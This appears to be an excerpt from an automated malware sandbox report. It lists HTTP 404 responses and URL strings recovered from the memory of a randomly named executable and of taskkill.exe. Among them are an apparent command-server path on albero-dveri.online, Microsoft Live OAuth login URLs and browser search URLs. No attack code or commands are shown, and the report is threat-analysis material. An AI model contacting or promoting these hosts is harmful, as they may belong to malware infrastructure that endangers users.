            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Sep 2024 16:02:46 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66aa3fcf-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Sep 2024 16:02:49 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66aa3fcf-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Sep 2024 16:02:49 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66aa3fcf-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Sun, 22 Sep 2024 16:02:55 GMT
            Server: Apache
            Content-Length: 203
            Connection: close
            Content-Type: text/html; charset=iso-8859-1
            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /znmp/ was not found on this server.</p></body></html>
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Sun, 22 Sep 2024 16:02:57 GMT
            Server: Apache
            Content-Length: 203
            Connection: close
            Content-Type: text/html; charset=iso-8859-1
            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /znmp/ was not found on this server.</p></body></html>
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Sun, 22 Sep 2024 16:03:00 GMT
            Server: Apache
            Content-Length: 203
            Connection: close
            Content-Type: text/html; charset=iso-8859-1
            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /znmp/ was not found on this server.</p></body></html>
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Sun, 22 Sep 2024 16:03:03 GMT
            Server: Apache
            Content-Length: 203
            Connection: close
            Content-Type: text/html; charset=iso-8859-1
            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /znmp/ was not found on this server.</p></body></html>
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Sun, 22 Sep 2024 16:03:09 GMT
            Server: Apache
            X-Frame-Options: SAMEORIGIN
            Content-Length: 32106
            X-XSS-Protection: 1; mode=block
            Connection: close
            Content-Type: text/html
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Sun, 22 Sep 2024 16:03:11 GMT
            Server: Apache
            X-Frame-Options: SAMEORIGIN
            Content-Length: 32106
            X-XSS-Protection: 1; mode=block
            Connection: close
            Content-Type: text/html
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Sun, 22 Sep 2024 16:03:14 GMT
            Server: Apache
            X-Frame-Options: SAMEORIGIN
            Content-Length: 32106
            X-XSS-Protection: 1; mode=block
            Connection: close
            Content-Type: text/html
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Sun, 22 Sep 2024 16:03:16 GMT
            Server: Apache
            X-Frame-Options: SAMEORIGIN
            Content-Length: 32106
            X-XSS-Protection: 1; mode=block
            Connection: close
            Content-Type: text/html; charset=utf-8
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: nginx/1.14.1
            Date: Sun, 22 Sep 2024 16:03:30 GMT
            Content-Length: 0
            Connection: close
            X-Rate-Limit-Limit: 5s
            X-Rate-Limit-Remaining: 19
            X-Rate-Limit-Reset: 2024-09-22T16:03:35.2633987Z
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Sun, 22 Sep 2024 16:04:11 GMT
            Content-Type: text/html
            Content-Length: 634
            Connection: close
            Server: Apache
            Data Ascii: <!DOCTYPE html><html data-page="404"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title> 404. </title></head><body><noscript><h1> 404. </h1><p>, , , , .</p><p><a href="https://jino.ru"></a></p></noscript><div id="root"></div><script src="//parking-static.jino.ru/static/main.js?1.25.2" charset="utf-8"></script></body></html>
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Sun, 22 Sep 2024 16:04:13 GMT
            Content-Type: text/html
            Content-Length: 634
            Connection: close
            Server: Apache
            Data Ascii: <!DOCTYPE html><html data-page="404"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title> 404. </title></head><body><noscript><h1> 404. </h1><p>, , , , .</p><p><a href="https://jino.ru"></a></p></noscript><div id="root"></div><script src="//parking-static.jino.ru/static/main.js?1.25.2" charset="utf-8"></script></body></html>
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Sun, 22 Sep 2024 16:04:16 GMT
            Content-Type: text/html
            Content-Length: 634
            Connection: close
            Server: Apache
            Data Ascii: <!DOCTYPE html><html data-page="404"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title> 404. </title></head><body><noscript><h1> 404. </h1><p>, , , , .</p><p><a href="https://jino.ru"></a></p></noscript><div id="root"></div><script src="//parking-static.jino.ru/static/main.js?1.25.2" charset="utf-8"></script></body></html>
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Sun, 22 Sep 2024 16:04:18 GMT
            Content-Type: text/html
            Content-Length: 634
            Connection: close
            Server: Apache
            Data Ascii: <!DOCTYPE html><html data-page="404"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title> 404. </title></head><body><noscript><h1> 404. </h1><p>, , , , .</p><p><a href="https://jino.ru"></a></p></noscript><div id="root"></div><script src="//parking-static.jino.ru/static/main.js?1.25.2" charset="utf-8"></script></body></html>
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: nginx
            Date: Sun, 22 Sep 2024 16:04:24 GMT
            Content-Type: text/html
            Transfer-Encoding: chunked
            Connection: close
            Content-Encoding: gzip
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: nginx
            Date: Sun, 22 Sep 2024 16:04:27 GMT
            Content-Type: text/html
            Transfer-Encoding: chunked
            Connection: close
            Content-Encoding: gzip
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: nginx
            Date: Sun, 22 Sep 2024 16:04:29 GMT
            Content-Type: text/html
            Transfer-Encoding: chunked
            Connection: close
            Content-Encoding: gzip
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Sep 2024 16:04:32 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: close
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/js/min.js?v2.3
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/28903/search.png)
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/28905/arrrow.png)
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/29590/bg1.png)
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.Palcoconnector.net
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3600066837.0000000008F64000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.albero-dveri.online
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3600066837.0000000008F64000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.albero-dveri.online/vyk8/
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.palcoconnector.net/Cable_Connectors.cfm?fp=c6vU2rntkHymqt5x3kJq4vMX0U8fOmaM0f8rwBVXAAMqMu
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.palcoconnector.net/Ntsc_Pal_Adapter.cfm?fp=c6vU2rntkHymqt5x3kJq4vMX0U8fOmaM0f8rwBVXAAMqMu
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.palcoconnector.net/Pal_TV.cfm?fp=c6vU2rntkHymqt5x3kJq4vMX0U8fOmaM0f8rwBVXAAMqMu%2BQUT7Wmg
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.palcoconnector.net/RCA_Connectors.cfm?fp=c6vU2rntkHymqt5x3kJq4vMX0U8fOmaM0f8rwBVXAAMqMu%2
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.palcoconnector.net/Wire_Connectors.cfm?fp=c6vU2rntkHymqt5x3kJq4vMX0U8fOmaM0f8rwBVXAAMqMu%
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.palcoconnector.net/__media__/design/underconstructionnotice.php?d=palcoconnector.net
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.palcoconnector.net/__media__/js/trademark.php?d=palcoconnector.net&type=ns
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.palcoconnector.net/display.cfm
            Source: taskkill.exe, 00000006.00000003.2312435085.000000000800E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://cdn.consentmanager.net
            Source: taskkill.exe, 00000006.00000003.2312435085.000000000800E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: taskkill.exe, 00000006.00000003.2312435085.000000000800E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: taskkill.exe, 00000006.00000003.2312435085.000000000800E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://delivery.consentmanager.net
            Source: taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
            Source: taskkill.exe, 00000006.00000003.2312435085.000000000800E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: taskkill.exe, 00000006.00000003.2312435085.000000000800E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: taskkill.exe, 00000006.00000003.2312435085.000000000800E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000737A000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.0000000005ECA000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.00000000079C2000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.0000000006512000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.0000000007830000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.0000000006380000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://jino.ru
            Source: taskkill.exe, 00000006.00000002.3591945619.00000000030F6000.00000004.00000020.00020000.00000000.sdmp, taskkill.exe, 00000006.00000003.2306329144.000000000311E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: taskkill.exe, 00000006.00000002.3591945619.00000000030F6000.00000004.00000020.00020000.00000000.sdmp, taskkill.exe, 00000006.00000003.2306329144.000000000311E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: taskkill.exe, 00000006.00000003.2306329144.000000000311E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
            Source: taskkill.exe, 00000006.00000002.3591945619.00000000030F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: taskkill.exe, 00000006.00000003.2306329144.000000000311E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
            Source: taskkill.exe, 00000006.00000002.3591945619.00000000030F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: taskkill.exe, 00000006.00000003.2306329144.000000000311E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: taskkill.exe, 00000006.00000002.3591945619.00000000030F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: taskkill.exe, 00000006.00000003.2305171931.0000000007FE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.00000000079C2000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.0000000006512000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.albero-dveri.online&rand=
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.00000000079C2000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.0000000006512000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://reg.ru
            Source: taskkill.exe, 00000006.00000003.2312435085.000000000800E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: taskkill.exe, 00000006.00000003.2312435085.000000000800E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.00000000079C2000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.0000000006512000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-3380909-25
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.00000000079C2000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.0000000006512000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_l
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.00000000079C2000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.0000000006512000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.00000000079C2000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.0000000006512000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_lan
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.00000000079C2000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.0000000006512000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-sites/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_l
